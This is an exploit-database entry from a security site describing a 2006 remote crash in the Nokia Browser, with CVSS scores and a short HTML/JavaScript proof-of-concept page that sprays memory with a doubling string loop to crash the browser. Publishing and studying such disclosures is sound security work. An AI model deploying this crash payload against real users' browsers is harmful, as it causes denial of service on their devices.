Nokia Browser Crash

2006.09.02
Credit: Qode
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<!-- Nokia Browser Crash by Qode http://www.qode.org --> <html><body><script> function crash() { alert('Nokia Browser Crash by Qode'); shellcode = unescape('%ucccc'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x400000) b+=b; } </script> Nokia Browser Crash by Qode<br> <input type='button' onClick='crash()' value='Crash'> </body></html>


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top